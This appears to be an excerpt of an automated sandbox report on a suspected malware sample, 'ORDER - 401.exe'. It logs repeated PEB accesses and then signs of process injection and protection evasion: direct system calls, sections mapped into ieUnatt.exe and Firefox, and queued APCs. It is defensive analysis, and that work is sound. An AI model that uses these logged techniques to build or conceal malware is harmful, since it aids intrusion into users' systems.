                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010229A0 mov eax, dword ptr fs:[00000030h]5_2_010229A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010229A0 mov eax, dword ptr fs:[00000030h]5_2_010229A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010229A0 mov eax, dword ptr fs:[00000030h]5_2_010229A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010229A0 mov eax, dword ptr fs:[00000030h]5_2_010229A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010229A0 mov eax, dword ptr fs:[00000030h]5_2_010229A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010229A0 mov eax, dword ptr fs:[00000030h]5_2_010229A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010109AD mov eax, dword ptr fs:[00000030h]5_2_010109AD
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010109AD mov eax, dword ptr fs:[00000030h]5_2_010109AD
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010989B3 mov esi, dword ptr fs:[00000030h]5_2_010989B3
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010989B3 mov eax, dword ptr fs:[00000030h]5_2_010989B3
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010989B3 mov eax, dword ptr fs:[00000030h]5_2_010989B3
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A69C0 mov eax, dword ptr fs:[00000030h]5_2_010A69C0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101A9D0 mov eax, dword ptr fs:[00000030h]5_2_0101A9D0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101A9D0 mov eax, dword ptr fs:[00000030h]5_2_0101A9D0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101A9D0 mov eax, dword ptr fs:[00000030h]5_2_0101A9D0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101A9D0 mov eax, dword ptr fs:[00000030h]5_2_0101A9D0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101A9D0 mov eax, dword ptr fs:[00000030h]5_2_0101A9D0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101A9D0 mov eax, dword ptr fs:[00000030h]5_2_0101A9D0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010449D0 mov eax, dword ptr fs:[00000030h]5_2_010449D0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DA9D3 mov eax, dword ptr fs:[00000030h]5_2_010DA9D3
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109E9E0 mov eax, dword ptr fs:[00000030h]5_2_0109E9E0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010429F9 mov eax, dword ptr fs:[00000030h]5_2_010429F9
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010429F9 mov eax, dword ptr fs:[00000030h]5_2_010429F9
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109C810 mov eax, dword ptr fs:[00000030h]5_2_0109C810
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B483A mov eax, dword ptr fs:[00000030h]5_2_010B483A
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B483A mov eax, dword ptr fs:[00000030h]5_2_010B483A
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104A830 mov eax, dword ptr fs:[00000030h]5_2_0104A830
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01032835 mov eax, dword ptr fs:[00000030h]5_2_01032835
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01032835 mov eax, dword ptr fs:[00000030h]5_2_01032835
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01032835 mov eax, dword ptr fs:[00000030h]5_2_01032835
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01032835 mov ecx, dword ptr fs:[00000030h]5_2_01032835
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01032835 mov eax, dword ptr fs:[00000030h]5_2_01032835
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01032835 mov eax, dword ptr fs:[00000030h]5_2_01032835
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01022840 mov ecx, dword ptr fs:[00000030h]5_2_01022840
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01040854 mov eax, dword ptr fs:[00000030h]5_2_01040854
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01014859 mov eax, dword ptr fs:[00000030h]5_2_01014859
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01014859 mov eax, dword ptr fs:[00000030h]5_2_01014859
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A6870 mov eax, dword ptr fs:[00000030h]5_2_010A6870
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A6870 mov eax, dword ptr fs:[00000030h]5_2_010A6870
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109E872 mov eax, dword ptr fs:[00000030h]5_2_0109E872
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109E872 mov eax, dword ptr fs:[00000030h]5_2_0109E872
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01010887 mov eax, dword ptr fs:[00000030h]5_2_01010887
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109C89D mov eax, dword ptr fs:[00000030h]5_2_0109C89D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103E8C0 mov eax, dword ptr fs:[00000030h]5_2_0103E8C0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DA8E4 mov eax, dword ptr fs:[00000030h]5_2_010DA8E4
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104C8F9 mov eax, dword ptr fs:[00000030h]5_2_0104C8F9
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104C8F9 mov eax, dword ptr fs:[00000030h]5_2_0104C8F9
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108EB1D mov eax, dword ptr fs:[00000030h]5_2_0108EB1D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108EB1D mov eax, dword ptr fs:[00000030h]5_2_0108EB1D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108EB1D mov eax, dword ptr fs:[00000030h]5_2_0108EB1D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108EB1D mov eax, dword ptr fs:[00000030h]5_2_0108EB1D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108EB1D mov eax, dword ptr fs:[00000030h]5_2_0108EB1D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108EB1D mov eax, dword ptr fs:[00000030h]5_2_0108EB1D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108EB1D mov eax, dword ptr fs:[00000030h]5_2_0108EB1D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108EB1D mov eax, dword ptr fs:[00000030h]5_2_0108EB1D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108EB1D mov eax, dword ptr fs:[00000030h]5_2_0108EB1D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103EB20 mov eax, dword ptr fs:[00000030h]5_2_0103EB20
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103EB20 mov eax, dword ptr fs:[00000030h]5_2_0103EB20
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D8B28 mov eax, dword ptr fs:[00000030h]5_2_010D8B28
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D8B28 mov eax, dword ptr fs:[00000030h]5_2_010D8B28
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010C4B4B mov eax, dword ptr fs:[00000030h]5_2_010C4B4B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010C4B4B mov eax, dword ptr fs:[00000030h]5_2_010C4B4B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B8B42 mov eax, dword ptr fs:[00000030h]5_2_010B8B42
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A6B40 mov eax, dword ptr fs:[00000030h]5_2_010A6B40
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A6B40 mov eax, dword ptr fs:[00000030h]5_2_010A6B40
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DAB40 mov eax, dword ptr fs:[00000030h]5_2_010DAB40
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BEB50 mov eax, dword ptr fs:[00000030h]5_2_010BEB50
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100CB7E mov eax, dword ptr fs:[00000030h]5_2_0100CB7E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020BBE mov eax, dword ptr fs:[00000030h]5_2_01020BBE
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020BBE mov eax, dword ptr fs:[00000030h]5_2_01020BBE
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010C4BB0 mov eax, dword ptr fs:[00000030h]5_2_010C4BB0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010C4BB0 mov eax, dword ptr fs:[00000030h]5_2_010C4BB0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01030BCB mov eax, dword ptr fs:[00000030h]5_2_01030BCB
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01030BCB mov eax, dword ptr fs:[00000030h]5_2_01030BCB
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01030BCB mov eax, dword ptr fs:[00000030h]5_2_01030BCB
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01010BCD mov eax, dword ptr fs:[00000030h]5_2_01010BCD
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01010BCD mov eax, dword ptr fs:[00000030h]5_2_01010BCD
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01010BCD mov eax, dword ptr fs:[00000030h]5_2_01010BCD
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BEBD0 mov eax, dword ptr fs:[00000030h]5_2_010BEBD0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01018BF0 mov eax, dword ptr fs:[00000030h]5_2_01018BF0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01018BF0 mov eax, dword ptr fs:[00000030h]5_2_01018BF0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01018BF0 mov eax, dword ptr fs:[00000030h]5_2_01018BF0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109CBF0 mov eax, dword ptr fs:[00000030h]5_2_0109CBF0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103EBFC mov eax, dword ptr fs:[00000030h]5_2_0103EBFC
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109CA11 mov eax, dword ptr fs:[00000030h]5_2_0109CA11
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104CA24 mov eax, dword ptr fs:[00000030h]5_2_0104CA24
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103EA2E mov eax, dword ptr fs:[00000030h]5_2_0103EA2E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01034A35 mov eax, dword ptr fs:[00000030h]5_2_01034A35
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01034A35 mov eax, dword ptr fs:[00000030h]5_2_01034A35
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104CA38 mov eax, dword ptr fs:[00000030h]5_2_0104CA38
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01016A50 mov eax, dword ptr fs:[00000030h]5_2_01016A50
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01016A50 mov eax, dword ptr fs:[00000030h]5_2_01016A50
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01016A50 mov eax, dword ptr fs:[00000030h]5_2_01016A50
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01016A50 mov eax, dword ptr fs:[00000030h]5_2_01016A50
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01016A50 mov eax, dword ptr fs:[00000030h]5_2_01016A50
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01016A50 mov eax, dword ptr fs:[00000030h]5_2_01016A50
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01016A50 mov eax, dword ptr fs:[00000030h]5_2_01016A50
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020A5B mov eax, dword ptr fs:[00000030h]5_2_01020A5B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020A5B mov eax, dword ptr fs:[00000030h]5_2_01020A5B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104CA6F mov eax, dword ptr fs:[00000030h]5_2_0104CA6F
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104CA6F mov eax, dword ptr fs:[00000030h]5_2_0104CA6F
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104CA6F mov eax, dword ptr fs:[00000030h]5_2_0104CA6F
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BEA60 mov eax, dword ptr fs:[00000030h]5_2_010BEA60
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108CA72 mov eax, dword ptr fs:[00000030h]5_2_0108CA72
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108CA72 mov eax, dword ptr fs:[00000030h]5_2_0108CA72
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101EA80 mov eax, dword ptr fs:[00000030h]5_2_0101EA80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101EA80 mov eax, dword ptr fs:[00000030h]5_2_0101EA80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101EA80 mov eax, dword ptr fs:[00000030h]5_2_0101EA80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101EA80 mov eax, dword ptr fs:[00000030h]5_2_0101EA80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101EA80 mov eax, dword ptr fs:[00000030h]5_2_0101EA80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101EA80 mov eax, dword ptr fs:[00000030h]5_2_0101EA80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101EA80 mov eax, dword ptr fs:[00000030h]5_2_0101EA80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101EA80 mov eax, dword ptr fs:[00000030h]5_2_0101EA80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101EA80 mov eax, dword ptr fs:[00000030h]5_2_0101EA80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010E4A80 mov eax, dword ptr fs:[00000030h]5_2_010E4A80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01048A90 mov edx, dword ptr fs:[00000030h]5_2_01048A90
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01018AA0 mov eax, dword ptr fs:[00000030h]5_2_01018AA0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01018AA0 mov eax, dword ptr fs:[00000030h]5_2_01018AA0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01066AA4 mov eax, dword ptr fs:[00000030h]5_2_01066AA4
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01066ACC mov eax, dword ptr fs:[00000030h]5_2_01066ACC
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01066ACC mov eax, dword ptr fs:[00000030h]5_2_01066ACC
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01066ACC mov eax, dword ptr fs:[00000030h]5_2_01066ACC
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01010AD0 mov eax, dword ptr fs:[00000030h]5_2_01010AD0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01044AD0 mov eax, dword ptr fs:[00000030h]5_2_01044AD0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01044AD0 mov eax, dword ptr fs:[00000030h]5_2_01044AD0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104AAEE mov eax, dword ptr fs:[00000030h]5_2_0104AAEE
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104AAEE mov eax, dword ptr fs:[00000030h]5_2_0104AAEE
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102AD00 mov eax, dword ptr fs:[00000030h]5_2_0102AD00
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102AD00 mov eax, dword ptr fs:[00000030h]5_2_0102AD00
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102AD00 mov eax, dword ptr fs:[00000030h]5_2_0102AD00
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01006D10 mov eax, dword ptr fs:[00000030h]5_2_01006D10
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01006D10 mov eax, dword ptr fs:[00000030h]5_2_01006D10
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01006D10 mov eax, dword ptr fs:[00000030h]5_2_01006D10
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01044D1D mov eax, dword ptr fs:[00000030h]5_2_01044D1D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010C8D10 mov eax, dword ptr fs:[00000030h]5_2_010C8D10
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010C8D10 mov eax, dword ptr fs:[00000030h]5_2_010C8D10
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01098D20 mov eax, dword ptr fs:[00000030h]5_2_01098D20
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01010D59 mov eax, dword ptr fs:[00000030h]5_2_01010D59
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01010D59 mov eax, dword ptr fs:[00000030h]5_2_01010D59
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01010D59 mov eax, dword ptr fs:[00000030h]5_2_01010D59
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01018D59 mov eax, dword ptr fs:[00000030h]5_2_01018D59
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01018D59 mov eax, dword ptr fs:[00000030h]5_2_01018D59
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01018D59 mov eax, dword ptr fs:[00000030h]5_2_01018D59
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01018D59 mov eax, dword ptr fs:[00000030h]5_2_01018D59
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01018D59 mov eax, dword ptr fs:[00000030h]5_2_01018D59
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A8D6B mov eax, dword ptr fs:[00000030h]5_2_010A8D6B
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: NULL target: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: NULL target: C:\Windows\SysWOW64\ieUnatt.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: NULL target: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: NULL target: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeThread register set: target process: 5704Jump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeThread APC queued: target process: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess created: C:\Users\user\Desktop\ORDER - 401.exe "C:\Users\user\Desktop\ORDER - 401.exe"Jump to behavior
